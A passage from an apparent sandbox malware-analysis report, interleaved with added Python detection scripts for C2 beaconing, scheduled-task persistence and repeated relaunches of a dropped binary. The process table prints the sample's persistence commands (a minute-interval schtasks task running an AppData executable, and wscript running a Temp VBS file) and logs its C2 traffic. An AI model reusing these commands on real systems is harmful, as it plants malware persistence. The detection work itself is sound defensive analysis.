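    r"(?P<src>[\d.]+)\s+(?P<sport>\d+)\s+(?P<dst>[\d.]+)\s+(?P<dport>\d+)\s+(?P<proto>\w+)$"
)


def parse_alerts(text):
    """Parse the flattened alert rows into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        rows.append({
            # strptime's %z accepts the colon-less "+0100" offset on every Python 3 version
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(m["sid"]), "sig": m["sig"], "severity": int(m["sev"]),
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]), "proto": m["proto"],
        })
    return rows


def connection_times(rows):
    """One timestamp per connection (src, sport, dst, dport), grouped by server.

    Several rows in the table share one timestamp (11:35:24.387568). Keeping only the
    latest alert per source port counts each connection once, at its last alert.
    """
    latest = {}
    for r in rows:
        key = (r["src"], r["sport"], r["dst"], r["dport"])
        if key not in latest or r["ts"] > latest[key]:
            latest[key] = r["ts"]
    by_server = defaultdict(list)
    for (src, _sport, dst, dport), ts in latest.items():
        by_server[(src, dst, dport)].append(ts)
    return {k: sorted(v) for k, v in by_server.items()}


def beacon_score(times, tolerance=0.25, min_intervals=8):
    """Return (median gap in seconds, fraction of gaps within tolerance, verdict).

    The median is robust to a single long gap (a missed or delayed check-in),
    which a mean-based check would let push the verdict the wrong way.
    """
    if len(times) < min_intervals + 1:
        return None, 0.0, False
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = statistics.median(gaps)
    within = sum(1 for g in gaps if abs(g - med) <= tolerance * med)
    frac = within / len(gaps)
    return med, frac, frac >= 0.8


def find_beacons(text):
    """Score every (client, server, port) triple seen in the alert text."""
    results = {}
    for key, times in connection_times(parse_alerts(text)).items():
        med, frac, hit = beacon_score(times)
        results[key] = {"connections": len(times), "median_s": med,
                        "regular_fraction": frac, "beacon": hit}
    return results


if __name__ == "__main__":
    for (src, dst, dport), r in find_beacons(ALERTS).items():
        print(f"{src} -> {dst}:{dport}  connections={r['connections']}  "
              f"median={r['median_s']:.2f}s  regular={r['regular_fraction']:.0%}  beacon={r['beacon']}")
```

On the rows above this yields twelve connections with a median gap of about 9.08 s and ten of eleven gaps within tolerance; the one outlier is the 13.9 s gap before the 11:36:59 connection. In production the same reduction would run over flow records rather than IDS alerts, so that traffic no signature names is still scored on cadence alone.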
                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Dec 30, 2024 11:35:41.843170881 CET | 49817 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:41.848299026 CET | 5552 | 49817 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:41.848414898 CET | 49817 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:41.848807096 CET | 49817 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:41.853662014 CET | 5552 | 49817 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:44.002301931 CET | 5552 | 49817 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:44.002414942 CET | 49817 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:44.062964916 CET | 49817 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:44.067873001 CET | 5552 | 49817 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:51.088294983 CET | 49869 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:51.093328953 CET | 5552 | 49869 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:51.093444109 CET | 49869 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:51.094216108 CET | 49869 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:51.099096060 CET | 5552 | 49869 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:53.250422955 CET | 5552 | 49869 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:35:53.250495911 CET | 49869 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:53.252087116 CET | 49869 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:35:53.256846905 CET | 5552 | 49869 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:00.196374893 CET | 49929 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:00.201329947 CET | 5552 | 49929 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:00.201419115 CET | 49929 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:00.201859951 CET | 49929 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:00.206677914 CET | 5552 | 49929 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:02.578927994 CET | 5552 | 49929 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:02.579005003 CET | 49929 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:02.625499010 CET | 49929 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:02.630433083 CET | 5552 | 49929 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:09.212075949 CET | 49976 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:09.216892004 CET | 5552 | 49976 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:09.217035055 CET | 49976 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:09.217516899 CET | 49976 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:09.222383022 CET | 5552 | 49976 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:11.359992981 CET | 5552 | 49976 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:11.360065937 CET | 49976 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:11.421736956 CET | 49976 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:11.426558018 CET | 5552 | 49976 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:18.277615070 CET | 49977 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:18.282558918 CET | 5552 | 49977 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:18.282669067 CET | 49977 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:18.283230066 CET | 49977 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:18.289098978 CET | 5552 | 49977 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:20.402379036 CET | 5552 | 49977 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:20.402478933 CET | 49977 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:20.454220057 CET | 49977 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:20.459461927 CET | 5552 | 49977 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:27.290857077 CET | 49979 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:27.295766115 CET | 5552 | 49979 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:27.295851946 CET | 49979 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:27.296276093 CET | 49979 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:27.301095963 CET | 5552 | 49979 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:29.419676065 CET | 5552 | 49979 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:29.419799089 CET | 49979 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:29.437378883 CET | 49979 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:29.442224026 CET | 5552 | 49979 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:36.366508007 CET | 49980 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:36.371532917 CET | 5552 | 49980 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:36.371651888 CET | 49980 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:36.378335953 CET | 49980 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:36.383153915 CET | 5552 | 49980 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:38.496921062 CET | 5552 | 49980 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:38.497024059 CET | 49980 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:38.546729088 CET | 49980 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:38.552361012 CET | 5552 | 49980 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:45.673728943 CET | 49981 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:45.678550005 CET | 5552 | 49981 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:45.678625107 CET | 49981 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:45.679040909 CET | 49981 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:45.683841944 CET | 5552 | 49981 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:59.567495108 CET | 5552 | 49981 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:59.567558050 CET | 49981 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:59.592952967 CET | 49981 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:59.597812891 CET | 5552 | 49981 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:59.618335962 CET | 49982 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:59.623193979 CET | 5552 | 49982 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:36:59.623297930 CET | 49982 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:59.623794079 CET | 49982 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:36:59.628649950 CET | 5552 | 49982 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:01.747854948 CET | 5552 | 49982 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:01.747958899 CET | 49982 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:01.773617029 CET | 49982 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:01.779041052 CET | 5552 | 49982 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:09.082726002 CET | 49983 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:09.091135979 CET | 5552 | 49983 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:09.091212034 CET | 49983 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:09.091777086 CET | 49983 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:09.101357937 CET | 5552 | 49983 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:11.587027073 CET | 5552 | 49983 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:11.587184906 CET | 49983 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:11.664946079 CET | 49983 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:11.669787884 CET | 5552 | 49983 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:18.149729013 CET | 49984 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:18.154710054 CET | 5552 | 49984 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:18.154823065 CET | 49984 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:18.155276060 CET | 49984 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:18.160110950 CET | 5552 | 49984 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:25.516892910 CET | 5552 | 49984 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:25.517122984 CET | 49984 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:25.546705961 CET | 49984 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:25.551527023 CET | 5552 | 49984 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:27.165215015 CET | 49985 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:27.170103073 CET | 5552 | 49985 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:27.170178890 CET | 49985 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:27.170694113 CET | 49985 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:27.175461054 CET | 5552 | 49985 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:29.299047947 CET | 5552 | 49985 | 172.111.138.100 | 192.168.2.9
                                       Dec 30, 2024 11:37:29.299190998 CET | 49985 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:29.358835936 CET | 49985 | 5552 | 192.168.2.9 | 172.111.138.100
                                       Dec 30, 2024 11:37:29.363872051 CET | 5552 | 49985 | 172.111.138.100 | 192.168.2.9
                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                       Dec 30, 2024 11:35:24.395662069 CET | 1.1.1.1 | 192.168.2.9 | 0x3ab0 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                       Dec 30, 2024 11:35:24.395662069 CET | 1.1.1.1 | 192.168.2.9 | 0x3ab0 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false


                                      Target ID:1
                                      Start time:05:35:29
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi"
                                      Imagebase:0x7ff7f6850000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:2
                                      Start time:05:35:29
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff7f6850000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:3
                                      Start time:05:35:30
                                      Start date:30/12/2024
                                      Path:C:\Windows\Installer\MSI4976.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Installer\MSI4976.tmp"
                                      Imagebase:0x320000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2616737221.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:false

                                      Target ID:4
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
                                      Imagebase:0xc50000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs
                                      Imagebase:0x500000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.2614707550.0000000003830000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.2614274905.00000000032A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.2614274905.00000000032C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Target ID:7
                                      Start time:05:35:31
                                      Start date:30/12/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
                                      Imagebase:0x330000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

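The process entries above record the persistence chain in full: the installer's MSI4976.tmp, cmd.exe wrapping a schtasks.exe call that registers a task to run SRACMB.exe from the user's AppData\Roaming every minute, and wscript.exe executing VYZSPQ.vbs out of the user's Temp folder. The Python below is an added example, not part of the Joe Sandbox report and not Joe Security's or the Sigma project's code. It encodes three process-creation checks a detection engineer would write against this chain and runs them over events built from the command lines listed above. The parent-process fields of those events are assumptions (this section of the report does not show parents), the benign daily-task event is a constructed control, and the five-minute modifier cutoff and the user-writable path pattern are the author's choices.

```python
"""Process-creation triage for the schtasks / wscript persistence chain in this report.

Added example; not report content and not Joe Security or Sigma code.
EVENTS: command lines copied from the report's process table; "parent" values
and the final benign control event are constructed assumptions.
"""
import re
import shlex

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"} | SCRIPT_HOSTS
# Directories a standard user can write to (assumed pattern, extend for your estate).
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.I)
# Custom-action binaries extracted by Windows Installer look like C:\Windows\Installer\MSI<hex>.tmp.
MSI_TMP = re.compile(r"\\Windows\\Installer\\MSI[0-9A-F]+\.tmp$", re.I)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")

EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi"'},
    {"image": r"C:\Windows\Installer\MSI4976.tmp", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'"C:\Windows\Installer\MSI4976.tmp"'},
    {"image": r"C:\Windows\SysWOW64\cmd.exe", "parent": r"C:\Windows\Installer\MSI4976.tmp",
     "cmd": r"C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1"},
    {"image": r"C:\Windows\SysWOW64\schtasks.exe", "parent": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r"schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1"},
    {"image": r"C:\Windows\SysWOW64\wscript.exe", "parent": r"C:\Windows\Installer\MSI4976.tmp",
     "cmd": r"WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs"},
    # Constructed benign control: daily task pointing at Program Files, no rule should fire.
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r'schtasks /create /tn "Vendor Update" /tr "C:\Program Files\Vendor\update.exe" /sc daily /st 03:00'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_args(cmdline):
    """Split a Windows command line into (program, {/flag: value|True}, positional args).

    posix=False keeps backslashes intact; surrounding quotes are stripped afterwards.
    """
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    opts, positional = {}, []
    i = 1
    while i < len(toks):
        t = toks[i]
        if t.startswith("/") and i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[t.lower()] = toks[i + 1]
            i += 2
        elif t.startswith("/"):
            opts[t.lower()] = True
            i += 1
        else:
            positional.append(t)
            i += 1
    return (toks[0] if toks else ""), opts, positional


def rule_minute_task_to_user_path(ev):
    """schtasks /create with a minute trigger (modifier <= 5) whose action lives in a user-writable path."""
    if basename(ev["image"]) != "schtasks.exe":
        return False
    _, opts, _ = parse_args(ev["cmd"])
    if "/create" not in opts:
        return False
    try:
        modifier = int(opts.get("/mo", 1))
    except ValueError:
        modifier = 1
    return (str(opts.get("/sc", "")).lower() == "minute" and modifier <= 5
            and bool(USER_WRITABLE.search(str(opts.get("/tr", "")))))


def rule_script_host_from_user_path(ev):
    """wscript/cscript given a script file that sits in a user-writable directory."""
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return False
    _, _, positional = parse_args(ev["cmd"])
    return any(p.lower().endswith(SCRIPT_EXT) and USER_WRITABLE.search(p) for p in positional)


def rule_msi_custom_action_spawns_shell(ev):
    """A Windows Installer custom-action binary launching a shell or script host."""
    return bool(MSI_TMP.search(ev["parent"])) and basename(ev["image"]) in SHELLS


RULES = {
    "minute_task_to_user_path": rule_minute_task_to_user_path,
    "script_host_from_user_path": rule_script_host_from_user_path,
    "msi_custom_action_spawns_shell": rule_msi_custom_action_spawns_shell,
}


def triage(events):
    """Map each command line that hits at least one rule to the list of rule names it hit."""
    hits = {}
    for ev in events:
        matched = [name for name, fn in RULES.items() if fn(ev)]
        if matched:
            hits[ev["cmd"]] = matched
    return hits


if __name__ == "__main__":
    for cmd, names in triage(EVENTS).items():
        print(f"{', '.join(names)}: {cmd}")
```

Run as-is, three of the six events fire: the cmd.exe child of MSI4976.tmp, the schtasks.exe registration (minute trigger into AppData\Roaming), and wscript.exe, which hits both the script-from-Temp and the installer-spawns-shell checks. The msiexec.exe launches and the daily Program Files task stay quiet, which is the point of keeping the trigger-interval and path conditions together rather than alerting on every schtasks /create.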
                                      Target ID:8
                                      Start time:05:35:33
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:05:35:40
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:05:35:48
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:05:35:56
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:15
                                      Start time:05:36:01
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:18
                                      Start time:05:37:00
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
                                      Imagebase:0xb0000
                                      File size:949'248 bytes
                                      MD5 hash:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true
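The process list above shows the same dropped binary, C:\Users\user\AppData\Roaming\Windata\SRACMB.exe (MD5 8C36CF56C0AA2ED05B8EC53CA0BFBAE1), started five times in roughly eighty seconds, 32-bit under WOW64 and without elevation. The following is an added example, not part of the Joe Sandbox report or of the sample, of how a hunting script could flag that pattern in process-creation telemetry: executables sitting one folder below %APPDATA%\Roaming, bursts of relaunches of the same image hash, and a direct hash IOC match. The event tuples are constructed from the report's own fields; the thresholds (three launches inside two minutes) and the tuple layout are assumptions, not a vendor log format.

```python
"""Added example (not part of the sandbox report): hunt for the relaunch
pattern shown in the process list, the same executable started repeatedly
from a folder directly under %APPDATA%\\Roaming.

Event tuples are constructed to mirror the report's fields (start time,
image path, MD5). Thresholds and the tuple layout are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# IOC copied from the report: MD5 of the dropped SRACMB.exe.
KNOWN_MD5 = "8C36CF56C0AA2ED05B8EC53CA0BFBAE1".lower()

# C:\Users\<user>\AppData\Roaming\<exactly one subfolder>\<name>.exe
ROAMING_EXE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming\\[^\\]+\\[^\\]+\.exe$", re.I)

SRACMB = r"C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"

# Constructed events: (timestamp, image path, md5). The five SRACMB rows
# mirror the report's start times; the last two rows are benign noise
# added so the rules have something to ignore.
SAMPLE_EVENTS = [
    ("2024-12-30 05:35:40", SRACMB, KNOWN_MD5),
    ("2024-12-30 05:35:48", SRACMB, KNOWN_MD5),
    ("2024-12-30 05:35:56", SRACMB, KNOWN_MD5),
    ("2024-12-30 05:36:01", SRACMB, KNOWN_MD5),
    ("2024-12-30 05:37:00", SRACMB, KNOWN_MD5),
    ("2024-12-30 05:36:30", r"C:\Windows\System32\svchost.exe", "0" * 32),
    ("2024-12-30 05:36:45", r"C:\Users\user\AppData\Roaming\Zoom\bin\Zoom.exe", "1" * 32),
]


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def roaming_executables(events):
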